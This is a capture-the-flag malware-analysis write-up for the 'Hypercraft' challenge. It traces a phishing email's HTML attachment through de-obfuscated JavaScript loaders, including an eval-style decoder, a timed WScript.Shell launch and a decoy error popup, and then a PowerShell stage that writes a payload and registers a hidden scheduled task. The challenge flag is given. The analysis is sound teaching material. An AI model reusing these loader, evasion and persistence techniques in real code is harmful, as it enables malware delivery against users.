Hypercraft

A medium-level challenge focused on malware analysis and de-obfuscating malicious code.

CHALLENGE DESCRIPTION

This email seems to have come from one of our agents, Axel Knight, but Axel has been missing for weeks, and we believe him to be compromised. The email claims to have information that could be vital to our winning this war, but before we use it, we want to make sure it is safe to open. Analyze the given email and see if it's real, or if it's just the Arodorians trying to phish us, and find the flag.

Evidence

  • hypercraft.eml

Solution

The challenge provides us with a .eml file, which is an email in plain text format. I will read it using the cat command.

cat hypercraft.eml

Content-Type: multipart/mixed; boundary="===============2174251299668768024=="
MIME-Version: 1.0
Delivered-To: gabriel.wolfe@mod.zenium.htb
From: axel.knight@mod.zenium.htb
To: gabriel.wolfe@mod.zenium.htb
Subject: Urgent - Plans for Arodorian Hypercraft

--===============2174251299668768024==
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit

Many Zeniumites died to recover the information provided here. Attached you'll find the schematics for the latest hypercraft spaceship under development by the Commonwealth of Arodor Maximus. These plans are more sophisticated than we expected, and show that we are at extreme risk of losing the race, and ultimately, our freedom. Please get these to our top engineers immediately, of all hope for the Zenium is lost.

I'm uploading this over a low-quality long-distance link. If the cloud copy is corrupted, try the download. You must get these plans to leadership. You're our only hope.

-- Axel
--===============2174251299668768024==
Content-Type: application/octet-stream
MIME-Version: 1.0
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="[TOP SECRET] Arodorian Hypercraft.pdf.html"

dW9zY3Zka3JjcmZvZXZpdGlpZmV4c2h1Y3VtYWJidmxiZGxndmhpa3Jxc3VheXN6ZG1qZWRldGxt
b3dheHBmZHFub3phcHRkYmlrY2R5d3Ntd3pnaWh6aXhwdGFxbmpyZGFwamtldnJ6cWR6cnRzbXZm
bWFzZml4aHd5aG56dWVyaW1zdXFseWx6ZWxtbmFyc20iPjwvZGl2PjwvYm9keT4KPC9odG1sPgo=

--===============2174251299668768024==--

This email was sent from axel.knight@mod.zenium.htb, a person who has been reported missing for a week. The content seems suspicious: the sender tries to convince the recipient that the email contains an important attachment and urges them to download it, and also asks the recipient to spread the suspicious attachment. To determine whether the attachment is malicious, we need to extract it from the .eml file.

I will use EML Extractor to complete this task. After successfully cloning the project, I used the following command line to extract the attachment:

python3 eml_extractor.py -f <FILE_PATH> -d <FILE_OUTPUT_PATH>

After running the command, we received a folder named Urgent - Plans for Arodorian Hypercraft, which contains a file called [TOP SECRET] Arodorian Hypercraft.pdf.html.

Now I will conduct static analysis on this suspicious file. First, I will compute the MD5 hash of the file and then search for that value on VirusTotal.

$ md5sum '[TOP SECRET] Arodorian Hypercraft.pdf.html' 
d1af9dfcd67ac678a1f52ea9bd4784e1  [TOP SECRET] Arodorian Hypercraft.pdf.htm
VirusTotal result

According to VirusTotal, this file is labeled trojan.cryxos/leonem. Looking at the Behavior tab, I noticed that this file drops another file named [TOP SECRET] Arodorian Hypercraft.pdf.js.

Files Dropped

To obtain this .js file, we need to perform dynamic analysis.

!!!!NOTE!!!!: To complete this task, we need to run the file in an isolated Windows environment that has no internet connection, and with Windows Defender turned off. Be sure to take a clean snapshot of your environment before running the malware, so you can revert to a clean state once you've finished the analysis.

We will trigger the file by double-clicking on it. A webpage will open, and a file named '[TOP SECRET] Arodorian Hypercraft.pdf.js' will be downloaded.

webpage
javascript file

Let's take a look at the code inside.

TOP SECRET JavaScript code

We can observe that the code has been obfuscated. To make it more readable, I have removed unnecessary comments and cleaned up the code, as shown below.

// Hex-encoded payload padded with the filler characters 's' and 'V', split across four variables (strings truncated here)
var yqybdscl = "Vs7V8VVV68s68s7VVV774...VV6ssss1VsVss";
var zuloqgnm = yqybdscl + "VssV6s665VVV...VsVV93V454V5ssV442";
var eplicmqe = zuloqgnm + "4V6sVVss5ssV3...V4VV6VsVsVVss";
var uwetjyhi = eplicmqe + "sssbs5V654VVs6V...VV0sVVVssVa";

var hfhwsgmb = 532;

// Control-flow flattening: spin on random values until 532 is hit, the only case in the switch
while (hfhwsgmb > 0) {
    hfhwsgmb = Math.floor(Math.random() * 10000) + 1;
    switch (hfhwsgmb)
    {
        case 532:
            hfhwsgmb = uwetjyhi.replace(/[sV]/g, '');   // strip the filler characters, leaving hex digits
            var ooqajrjz = "";
            for (var ioxpkxez = 0; ioxpkxez < hfhwsgmb.length; ioxpkxez += 2)
            {
                var ttjqepbj = hfhwsgmb.substr(ioxpkxez, 2);              // one hex pair
                ooqajrjz += tjkdjlll(kmbvxuoa(ttjqepbj, 2519 - 2503));   // parseInt(pair, 16) -> character
            }
            cyfgvptr(ooqajrjz);   // execute the decoded JavaScript
            hfhwsgmb = -532;      // leave the outer loop
            break;
    }
}

// parseInt wrapper: eutxbhhz is the digit string, eiexokbr the radix (16 here)
function kmbvxuoa(eutxbhhz, eiexokbr){
    var ifhzpbrq = parseInt(eutxbhhz, eiexokbr);
    return ifhzpbrq;
}

// eval equivalent: compile the decoded string as a function and call it
function cyfgvptr(phfljyaj) {
    (Function(phfljyaj)());
}

// String.fromCharCode wrapper
function tjkdjlll(dbcsdyyw){
    var zjxkhodr = String.fromCharCode(dbcsdyyw);
    return zjxkhodr;
}

With the readable version, we can easily understand what the code is doing. The attacker assigns an encoded value to a variable, and the rest of the code decodes the value of the uwetjyhi variable. We can see that the cyfgvptr() function is called with the decoded text as its parameter, and it executes that text as code via Function(). Therefore, we will print the parameter out instead.

function cyfgvptr(phfljyaj) {
    //(Function(phfljyaj)());
    console.log(phfljyaj)
}
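Instead of patching cyfgvptr() to log its argument, the first stage can also be decoded statically. This is an added example, not code from the write-up or from the sample: a decoder for the filler-plus-hex scheme above (the 's'/'V' filler set is taken from the sample's regex), plus an encoder used only to build a constructed test blob.

```javascript
// Static decoder for stage 1: strip the filler characters, then turn every
// two hex digits into one character. Returns the decoded script as a string
// instead of handing it to Function().
function decodeStage1(blob, fillers = "sV") {
  // fillers must be non-hex characters; 's' and 'V' come from the sample's /[sV]/g
  const hex = blob.replace(new RegExp("[" + fillers + "]", "g"), "");
  if (hex.length % 2 !== 0) {
    throw new Error("odd number of hex digits after stripping fillers");
  }
  let out = "";
  for (let i = 0; i < hex.length; i += 2) {
    const byte = parseInt(hex.substr(i, 2), 16);
    if (Number.isNaN(byte)) throw new Error("non-hex pair at offset " + i);
    out += String.fromCharCode(byte);
  }
  return out;
}

// Inverse of the scheme, used here only to build a constructed sample blob
// (filler characters are inserted deterministically so tests are repeatable).
function encodeStage1(text, fillers = "sV") {
  let out = "";
  for (const ch of text) {
    const hex = ch.charCodeAt(0).toString(16).padStart(2, "0");
    out += fillers[out.length % fillers.length] + hex;
  }
  return out + fillers[0];
}

// Visible prefix of yqybdscl from the sample; it decodes to the start of the
// next stage's first identifier, "xhhwt".
const VISIBLE_PREFIX = "Vs7V8VVV68s68s7VVV774";
const CONSTRUCTED = encodeStage1('WScript.Echo("constructed sample")');
```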

Save the cleaned code to a JavaScript file and run it. The result is a new piece of JavaScript code:

xhhwtarcadepz = function(suadklsw) {
var twgoctfv={};
var qhypodermichff = 74142;
var vyafisoftcoverqa = false;
var aqMonsantoo = "undefined";
var qluypartitionswl = false;
var zwbwopamphletkzca = false;
var iibigrqb;
var kyieithero = null;
var xglistenicl = null;
var tsrjtemplelrhz = "undefined";
var mdijwdetachw = null;
var yghnplatypuszfwv = 60163;
var gqpsaltyoem = null;
var vbasemanozbcu = 39296;
var tsyphiliticddc = true;
var xulqdiurnald = "undefined";

...

if ((qhchhvwd - yjdednyw) > (14*60*(693+235)) ){
ugerrorfkln[ynvjonvw[606-603]](ynvjonvw[56969-56967], keCarthagedf);
var juoqcpeakyspzxe = null;
var xhsqdoggingjtqhu = 73338;
var qdiploidypdme = "undefined";
break;
var xhsgprocaineciynd = 48992;
var fozosemix = "undefined";
var cifloebukri = "undefined";
var ekbuxomppse = "undefined";
var uzMcGillcwe = null;
var fkwiggleocgh = "undefined";
var hpnandesinela = false;
var tskscouplero = false;
var lriddlernlxx = null;
}
}
;
var jdrmocontactw = 88628;
var tfjboclutchwgdsp = true;
var kycinferringpz = false;
var eluvespereo = false;
var zlpremorsefulv = "undefined";
var yhikwMaggiey = 37493;

Upon examining the code, I noticed it contains many redundant variables that are not used in the program. Therefore, I will remove these unnecessary variables to make the code easier to read. Below is the cleaned version of the code.

xhhwtarcadepz = function(suadklsw) {
    var twgoctfv = {};
    var iibigrqb;
    var ldarlpqp = 0;
    var aipywtro;
    var hsfmolvo;
    var lkcbpepr = 0;
    var xolcqgjr;
    var rstkcnio = '';
    var enspnabr = String.fromCharCode;
    var cgopmyzu = suadklsw.length;
    var uvitiluo = "ABCDEFGHIJKLMNOPQRS";
    var anqueniw = uvitiluo + "TUVWXYZabcdefghijklmnopqrstu";
    var derxyhbz = anqueniw + "vwxyz0123456789+/";   // the standard base64 alphabet, split across three strings

    for (iibigrqb = 0; iibigrqb < 64; iibigrqb++) {
        twgoctfv[derxyhbz.charAt(iibigrqb)] = iibigrqb;   // character -> 6-bit value
    }
    var wlliykhz = 8;                      // bits per output byte
    var xvqehhfj = 255;                    // byte mask
    var kdtujfic = xvqehhfj - 253;         // 2
    var cpnyehmi = wlliykhz - kdtujfic;    // 6 bits per input character
    for (hsfmolvo = 0; hsfmolvo < cgopmyzu; hsfmolvo++) {
        aipywtro = twgoctfv[suadklsw.charAt(hsfmolvo)];
        ldarlpqp = (ldarlpqp << cpnyehmi) + aipywtro;   // accumulate 6 bits
        lkcbpepr += cpnyehmi;
        while (lkcbpepr >= wlliykhz) {
            // emit a byte whenever 8 bits are available; zero bytes produced by the last two (padding) characters are dropped
            ((xolcqgjr = (ldarlpqp >>> (lkcbpepr -= wlliykhz)) & xvqehhfj) || (hsfmolvo < (cgopmyzu - kdtujfic))) && (rstkcnio += enspnabr(xolcqgjr));
        }
    }
    return rstkcnio;   // this is plain base64 decoding
};

var keCarthagedf = 0;        // window style later passed to run(): 0 = hidden
var yjdednyw = new Date();   // start time for the delay check below
var atojqpvq = "YWtpaXNxYmNxemJlZ3V0aW50aGFsb...zZ0b3ZZdjZTOTg2anZ";   // base64 payload (truncated here)
var svmnayxo = atojqpvq + "OUmRHaFM3Mk5MR0tsNys5Q2lQQk5pUGI4TTBF...kprSEQ5SUIvQzl0eGo";
var wtuvcrbr = svmnayxo + "vWXR4c1JqOUwwbjFZN0xpVi9w...3B0UDY3ZzZBVEduWjQxTG5QRWdvd1l";
var tiogqfbg = wtuvcrbr + "aVEZka";

var vftbkkmw = tiogqfbg + "ktPWmxFaGFlOHJMT09LaX...TTgvUjRZdURnc0d2aTQzcDJpT3";
var bxmanhtn = vftbkkmw + "hzUHJPbjJneUxmbzRMNXY1T3lxZ1BsU2tVW...5wb3ZuYWNwbGRsend6a2lpdmVv";
var ynvjonvw = xhhwtarcadepz(bxmanhtn).split("!");   // decoded payload, split on "!" into an array

// ynvjonvw[4] = "ActiveXObject", ynvjonvw[1] = "Wscript.Shell"
ugerrorfkln = new this[ynvjonvw[94052 - 94048]](ynvjonvw[75319 - 75318]);

ugerrorfkln.PopUp("This document is corrupt.", 10, "ERROR", 48);   // decoy error dialog

while (true) {
    WScript.Sleep(10);

    var qhchhvwd = new Date();
    // wait 14 * 60 * 928 ms (about 13 minutes) before running, longer than a short sandbox run
    if ((qhchhvwd - yjdednyw) > (14 * 60 * (693 + 235))) {
        // ynvjonvw[3] = "run", ynvjonvw[2] = the PowerShell command line
        ugerrorfkln[ynvjonvw[606 - 603]](ynvjonvw[56969 - 56967], keCarthagedf);
        break;
    }
};

With the cleaner code, here is a quick summary:

  • The function xhhwtarcadepz decodes the encoded message that is passed to it.

  • The variable bxmanhtn contains the encoded message.

  • The variable ynvjonvw will contain the output of the xhhwtarcadepz function, split on "!" into an array of readable strings.

  • The variable ugerrorfkln executes one element of ynvjonvw. The execution is only triggered after a certain delay.

Therefore, I will print out the ynvjonvw variable and comment out the execution section.

var ynvjonvw = xhhwtarcadepz(bxmanhtn).split("!");
console.log(ynvjonvw)
// ugerrorfkln = new this[ynvjonvw[94052 - 94048]](ynvjonvw[75319 - 75318]);

// ugerrorfkln.PopUp("This document is corrupt.", 10, "ERROR", 48);

// while (true) {
//     WScript.Sleep(10);
    
//     var qhchhvwd = new Date();
//     if ((qhchhvwd - yjdednyw) > (14 * 60 * (693 + 235))) {
//         ugerrorfkln[ynvjonvw[606 - 603]](ynvjonvw[56969 - 56967], keCarthagedf);
//         break;
//     }
// }; 
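An alternative to commenting out the execution section is to leave the stage-2 logic intact and emulate the host objects it expects. This is an added example, not code from the write-up or the sample: a fake ActiveXObject records the PopUp and run calls, and a fake clock advances on every WScript.Sleep so the roughly 13-minute delay passes in a few iterations. It assumes Node (for Buffer) and uses a constructed blob laid out like the real ynvjonvw array.

```javascript
// Emulated WScript host: captures what the sample would do instead of doing it.
function makeHost() {
  const captured = { popups: [], runs: [], sleeps: 0 };
  // Stand-in for new this["ActiveXObject"]("Wscript.Shell")
  function ActiveXObject(progId) {
    if (progId.toLowerCase() !== "wscript.shell") throw new Error("unexpected ProgID " + progId);
    return {
      PopUp: (text) => { captured.popups.push(text); return 0; },
      run: (cmd, style) => { captured.runs.push({ cmd, style }); return 0; },
    };
  }
  // Sleep skipping: each Sleep advances a fake clock by one minute, so the
  // 14*60*928 ms check passes after 13 iterations instead of 13 real minutes.
  let fakeNow = 0;
  const WScript = { Sleep: () => { fakeNow += 60000; captured.sleeps++; } };
  return { captured, ActiveXObject, WScript, now: () => fakeNow };
}

// The cleaned stage-2 logic from the write-up, with host calls routed to the fake host.
function emulate(blob) {
  const host = makeHost();
  // xhhwtarcadepz is plain base64, so Buffer yields the same "!"-separated array
  const parts = Buffer.from(blob, "base64").toString("latin1").split("!");
  const start = host.now();
  const shell = new host[parts[4]](parts[1]);   // "ActiveXObject", "Wscript.Shell"
  shell.PopUp("This document is corrupt.", 10, "ERROR", 48);
  while (true) {
    host.WScript.Sleep(10);
    if ((host.now() - start) > (14 * 60 * (693 + 235))) {
      shell[parts[3]](parts[2], 0);             // "run"(command, hidden window)
      break;
    }
  }
  return host.captured;
}

// Constructed sample blob: junk!progid!command!run!ActiveXObject!junk, like the real array
const SAMPLE_BLOB = Buffer.from(
  ["junk", "Wscript.Shell", "powershell -c 'placeholder'", "run", "ActiveXObject", "junk"].join("!"),
  "latin1").toString("base64");
```

Running emulate(SAMPLE_BLOB) returns the captured command line and window style without anything being executed.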

Run the JavaScript with node and we will see the result:

node file_name.js

[
  'akiisqbcqzbegutinthalocycpyvjexcdqaouloezjybswhekavemrehcdsbxrloedzmynhszgggpumsojoovqlipkbtoqjjkerldknkffjsnecwvbuzysqnwkoidbkr',
  'Wscript.Shell',
  "PoweRShElL -EXEcU  byPAss    'IEx(NEW-oBJeCT  SYsTeM.iO.COmpResSion.dEfLaTestReAm( [SySTem.IO.meMOrYStReAm] [convert]::FromBase64String(''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''),[SyStEM.IO.COMPreSSION.cOMPRessIONmodE]::DECOMPReSS)| FOrEach{NEW-oBJeCT  iO.sTReAMREaDEr( $_,[SYsTeM.TExt.eNcodiNg]::AsCii ) } ).reaDTOEnd( )'\n",                                                               
  'run',
  'ActiveXObject',
  'kdqbvzfpmscejstipmozjcjwluruhaufghutroaypxxmmapeqtcvxnounkpqlizdukfxifkyqgyioopdphkehrdlfiozvoximzgzagkixopenpovnacpldlzwzkiiveo'
]

We can see that a PowerShell script will be executed by this code. However, the script is encoded (base64 of a Deflate-compressed stream, as the FromBase64String and DeflateStream calls show). I will use CyberChef to decode it.

CyberChef decoding the PowerShell script
// PowerShell script

 SET-ItEM ("VAr"+"Ia"+"B"+"le:4z0")  ([TypE]("{2}{3}{1}{0}" -f'odinG','.enC','sYSTEm.T','ext')  )  ;   sv  IgF  (  [TypE]("{1}{0}{2}{3}" -f'OnVe','SYsTEM.c','r','T')  )  ;sV ('5EV'+'lS') ([type]("{1}{2}{0}" -F 'E','Io','.fIL'))  ;  &("{4}{1}{3}{0}{2}"-f 'ri','et-','ctMode','St','S') -Version 2
function UYc`xq (${TN`me},${Chk`go`Iul}) {
    for (${eum`lMx`NyUg} = 0; ${eu`mL`MxNYug} -lt ${T`NME}."c`OUnt"; ${Eu`MLMx`NyUG}++) {
       ${T`NME}[${eUM`lM`XnyuG}] = (${t`NmE}[${eUm`Lmx`N`yuG}] -bxor ${c`HKGo`iUl})
    }
    return  ( gEt-vaRIAble ("4"+"Z0")  -VaL)::"As`Cii"."gETs`T`RIng"(${tN`Me})
}
function Rc`DAt`CaJT {return (1..16 | .('%'){ '{0:X}' -f (&("{0}{2}{1}" -f 'Ge','andom','t-R') -Max 16) }) -join ''}
${E`UM`lm`XNy`UGzzOO} = (&("{0}{1}" -f 'UyC','xq') ([System.Byte[]] @(0x0a,0x16,0x16,0x12,0x58,0x4d,0x4d,0x11,0x16,0x0d,0x0e,0x07,0x0c,0x12,0x0e,0x03,0x0c,0x11,0x4c,0x0a,0x16,0x00,0x4d,0x10,0x4d)) 98)
${suQ`QsIgl} = (.("{1}{0}" -f 'Cxq','Uy') ([System.Byte[]] @(0x31,0x3c,0x36)) 80)
${X`s`xnap`VE} = (&("{1}{0}"-f'xq','UyC') ([System.Byte[]] @(0x42,0x13,0x7d,0x4c,0x4c,0x78,0x5d,0x48,0x5d,0x13,0x70,0x53,0x5f,0x5d,0x50,0x13,0x71,0x55,0x5f,0x4e,0x53,0x4f,0x53,0x5a,0x48,0x13,0x6b,0x55,0x52,0x58,0x53,0x4b,0x4f,0x13,0x6c,0x53,0x4b,0x59,0x4e,0x6f,0x54,0x59,0x50,0x50,0x13)) 60)
&('cd') ${XSx`NAp`Ve}
${cyR`YX`whqM} = (.("{1}{2}{0}" -f 't','R','cDATCAJ'))+(.("{0}{1}"-f 'UyC','xq') ([System.Byte[]] @(0x67,0x3f,0x2b,0x3a)) 73)
${N`yNG} = (.("{1}{0}" -f 'd','pw')).("{0}{1}{2}" -f 'ToStr','i','ng').Invoke() + '\' + ${cyRYXw`H`qM}
${WbwM`g`QB} = (.("{2}{1}{0}"-f 'Jt','TCA','RcDA')) + (.("{3}{1}{2}{0}" -f'Jt','AT','CA','RcD'))
${u`JRW} = $(.("{0}{1}" -f 'whoa','mi'))
${EUMLmX`NYuGS`WAb`lOEP} = (.("{1}{0}"-f'yCxq','U') ([System.Byte[]] @(0x5d,0x7d,0x45,0x3d,0x4d,0x42,0x60,0x50,0x5d,0x37,0x4e,0x74,0x67,0x4c,0x55,0x71,0x55,0x5c,0x4e,0x6a,0x60,0x53,0x35,0x68,0x66,0x6a,0x56,0x7e,0x4f,0x40,0x45,0x74,0x47,0x6a,0x4a,0x68,0x60,0x47,0x46,0x7e,0x4d,0x40,0x34,0x63,0x55,0x37,0x4e,0x68,0x5d,0x5c,0x56,0x68,0x50,0x36,0x4e,0x75,0x5e,0x53,0x4a,0x34,0x4f,0x47,0x4e,0x5c,0x51,0x36,0x4a,0x7d,0x65,0x5c,0x46,0x34,0x48,0x68,0x4a,0x6b,0x5e,0x53,0x7c,0x77,0x4d,0x6d,0x6f,0x4f,0x67,0x7d,0x31,0x57,0x60,0x53,0x30,0x63,0x4d,0x6a,0x46,0x72,0x60,0x36,0x52,0x7d,0x67,0x36,0x6c,0x68,0x66,0x43,0x73,0x71,0x5e,0x5c,0x6c,0x68,0x4d,0x47,0x35,0x68,0x61,0x43,0x52,0x6e,0x4d,0x43,0x4e,0x31,0x67,0x43,0x42,0x7e,0x67,0x7d,0x45,0x6d,0x4d,0x47,0x5d,0x63,0x5d,0x7d,0x73,0x73,0x47,0x63,0x39,0x39)) 4);
${r`ERbWtRv} =  $igf::("{1}{3}{0}{2}{4}"-f 'ase64','From','Strin','B','g').Invoke(${eu`ml`MXny`UgsW`ABl`OEp})
  (get-VariAbLe ('5EV'+'LS')  -Va)::("{1}{2}{0}" -f'ytes','wri','teallb').Invoke(${N`ynG},${ReR`Bw`TRV});
${as`kz`pH`UpAj} = (.("{0}{1}"-f'p','wd')).("{0}{1}{2}"-f'ToStr','in','g').Invoke() + '\'
${vQp`SBX`gyj} = (&("{3}{0}{2}{1}" -f 'cD','Jt','ATCA','R'))
${a`etR`sd`f} = (&("{2}{1}{0}" -f 'q', 'cx', 'UY') ([System.Byte[]] @(0x97,0x8b,0x9d,0xa4,0xb3,0xef,0xab,0xac,0x80,0xb0,0xb9,0x80,0xb3,0xeb,0x86,0xec,0xad,0xac,0x80,0xb6,0x91,0x80,0xab,0xb7,0xeb,0xab,0x80,0xee,0xa2)) 223)
${t`kqr`mLSfPD} = '"' + (&("{1}{0}"-f 'xq','UyC') ([System.Byte[]] @(0x22,0x2e,0x33,0x6b,0x63,0x22,0x3c,0x39,0x6b,0x66,0x3e,0x38,0x2e,0x29,0x6b)) 75) + "$eUmLmxNYuGZZoO$suqqSiGL/$vQpsbXGyj)" + '"' 
${eRQ`cf} = &("{1}{4}{3}{6}{2}{5}{0}"-f'TaskAction','New-S','le','e','ch','d','du') -Execute "$aSKZpHuPaj$cyrYXWhqM" -Argument ${Tk`Q`Rmls`FpD}
${tpNDJP`w`Aa} = .("{1}{2}{0}{4}{6}{3}{5}"-f'h','New-S','c','edTaskPrin','edu','cipal','l') "$UJrw"
${aIuf`d`yWasr} = .("{4}{1}{5}{2}{0}{3}" -f'igge','w-Sche','askTr','r','Ne','duledT') -Once -At (&("{0}{1}"-f 'Get-D','ate')).AddDays(1) -RepetitionInterval (&("{1}{2}{0}" -f'pan','New-Time','S') -Days 1) -RepetitionDuration (.("{1}{2}{3}{0}"-f'n','New-Ti','meS','pa') -Days(365))
${d`wtTAWqx} = .("{5}{4}{0}{6}{1}{3}{2}" -f 'ledT','skS','ttingsSet','e','w-Schedu','Ne','a') -Hidden -MultipleInstances ("{0}{2}{1}" -f'Par','el','all') -AllowStartIfOnBatteries
.("{2}{1}{3}{4}{6}{0}{5}"-f 'T','egis','R','ter-','Sche','ask','duled') -TaskName ${WbWm`g`Qb} -Action ${Er`qcf} -Trigger ${AI`Uf`dY`WASr} -Settings ${dW`TTAWqx}

Quick summary:

  • Function UYcxq decodes an encoded byte array by XORing every byte with a one-byte key and returning the result as an ASCII string.

  • The results of the UYcxq calls are saved in the variables EUMlmXNyUGzzOO, suQQsIgl, XSxNApVe, aetRsdf and tkqrmLSfPD.

  • The code will set up a new scheduled task to run the malicious

We can use PowerShell to print out all the command lines that were obfuscated.

We will print out the values saved in those variables by running the code below in PowerShell.
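The same XOR-and-decode step can be done outside PowerShell. This is an added example, not the write-up's code or the sample's: UYcxq reimplemented in JavaScript and run over three of the byte arrays copied from the script above (the key follows each array in the script).

```javascript
// Equivalent of UYcxq: XOR every byte with the one-byte key, read as ASCII.
function xorDecode(bytes, key) {
  if (key < 0 || key > 255) throw new RangeError("key must fit in one byte");
  return String.fromCharCode(...bytes.map((b) => b ^ key));
}

// Byte arrays and keys copied from the de-obfuscated PowerShell script.
const PATH_BYTES = [0x42,0x13,0x7d,0x4c,0x4c,0x78,0x5d,0x48,0x5d,0x13,0x70,0x53,0x5f,0x5d,0x50,0x13,
  0x71,0x55,0x5f,0x4e,0x53,0x4f,0x53,0x5a,0x48,0x13,0x6b,0x55,0x52,0x58,0x53,0x4b,0x4f,0x13,
  0x6c,0x53,0x4b,0x59,0x4e,0x6f,0x54,0x59,0x50,0x50,0x13];                    // key 60
const EXT_BYTES = [0x67,0x3f,0x2b,0x3a];                                          // key 73
const FLAG_BYTES = [0x97,0x8b,0x9d,0xa4,0xb3,0xef,0xab,0xac,0x80,0xb0,0xb9,0x80,0xb3,0xeb,0x86,
  0xec,0xad,0xac,0x80,0xb6,0x91,0x80,0xab,0xb7,0xeb,0xab,0x80,0xee,0xa2];        // key 223

// Decodes the strings the script builds before registering its scheduled task.
function decodeScriptStrings() {
  return {
    dropDir: xorDecode(PATH_BYTES, 60),   // directory the script cd's into before writing its payload
    ext: xorDecode(EXT_BYTES, 73),        // extension appended to the random file name
    flag: xorDecode(FLAG_BYTES, 223),     // the last decoded value, stored in aetRsdf
  };
}
```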

Flag: HTB{l0ts_of_l4Y3rs_iN_th4t_1}
